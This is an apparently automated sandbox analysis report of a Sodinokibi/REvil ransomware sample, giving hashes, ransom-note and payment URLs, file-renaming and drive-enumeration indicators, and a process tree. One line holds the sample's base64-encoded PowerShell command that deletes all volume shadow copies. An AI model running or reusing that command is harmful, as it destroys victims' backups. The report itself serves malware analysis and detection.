Analysis
-
max time kernel
152s -
max time network
189s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
16-06-2022 03:40
Static task
static1
Behavioral task
behavioral1
Sample
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
Resource
win10v2004-20220414-en
General
-
Target
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
-
Size
164KB
-
MD5
bf31b07ed28a86bd34223675a8496fdb
-
SHA1
ba660ebd94e582847e8b13320214c0ffd0811d1c
-
SHA256
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50
-
SHA512
97777ccf1a9b6f9952163afffb07eca233a6e074e02cb3f25bcc18fe5ef3a60f3b15ede43d216adea2f7a5bc0607cde244525c6770b99e32d9e10ea4745707c2
Malware Config
Extracted
C:\100om-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/736D09ACDCF968F3
http://decryptor.top/736D09ACDCF968F3
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exedescription ioc process File renamed C:\Users\Admin\Pictures\BackupClose.png => \??\c:\users\admin\pictures\BackupClose.png.100om 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File renamed C:\Users\Admin\Pictures\DebugProtect.crw => \??\c:\users\admin\pictures\DebugProtect.crw.100om 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File renamed C:\Users\Admin\Pictures\ResumeGroup.png => \??\c:\users\admin\pictures\ResumeGroup.png.100om 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File renamed C:\Users\Admin\Pictures\SkipConvertFrom.crw => \??\c:\users\admin\pictures\SkipConvertFrom.crw.100om 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File renamed C:\Users\Admin\Pictures\WriteRestart.crw => \??\c:\users\admin\pictures\WriteRestart.crw.100om 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File renamed C:\Users\Admin\Pictures\UnprotectProtect.png => \??\c:\users\admin\pictures\UnprotectProtect.png.100om 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exedescription ioc process File opened (read-only) \??\S: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\V: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\W: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\Z: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\L: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\P: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\Q: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\K: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\R: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\D: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\A: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\E: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\G: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\Y: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\H: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\M: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\N: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\J: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\O: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\T: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\U: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\X: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\B: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\F: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened (read-only) \??\I: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\mg38980z.bmp" 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe -
Drops file in Program Files directory 30 IoCs
Processes:
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exedescription ioc process File created \??\c:\program files (x86)\100om-readme.txt 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\LimitHide.vssm 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\MoveGrant.M2TS 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\StepEdit.mpv2 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\ConvertRevoke.jpeg 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\UninstallPop.wpl 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\ConvertFromTest.potx 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\LockPop.bmp 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\PopExit.pub 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\GroupSearch.emz 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\CompleteResume.DVR-MS 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\CopyRemove.potx 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\MoveConvertTo.js 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\NewTrace.dxf 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\PingUpdate.vst 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\MoveJoin.pcx 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\RestartSubmit.gif 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\ResumeConfirm.WTV 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File created \??\c:\program files\100om-readme.txt 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\CompressFormat.jpe 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\CopyClear.rar 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\DismountRead.htm 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\GetResolve.pptx 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\UndoSend.wma 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\EnableRestart.eps 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\RedoSubmit.pptx 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\TraceRevoke.wvx 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\ReceiveMerge.3gp 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\StartEdit.rle 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe File opened for modification \??\c:\program files\TestRestore.wm 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exepowershell.exepid process 1440 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe 1440 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe 4348 powershell.exe 4348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 4348 powershell.exe Token: SeBackupPrivilege 2368 vssvc.exe Token: SeRestorePrivilege 2368 vssvc.exe Token: SeAuditPrivilege 2368 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exedescription pid process target process PID 1440 wrote to memory of 4348 1440 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe powershell.exe PID 1440 wrote to memory of 4348 1440 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe"C:\Users\Admin\AppData\Local\Temp\27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4348-130-0x0000000000000000-mapping.dmp
-
memory/4348-131-0x000001A64A310000-0x000001A64A332000-memory.dmpFilesize
136KB
-
memory/4348-132-0x00007FFF9A210000-0x00007FFF9ACD1000-memory.dmpFilesize
10.8MB
-
memory/4348-133-0x00007FFF9A210000-0x00007FFF9ACD1000-memory.dmpFilesize
10.8MB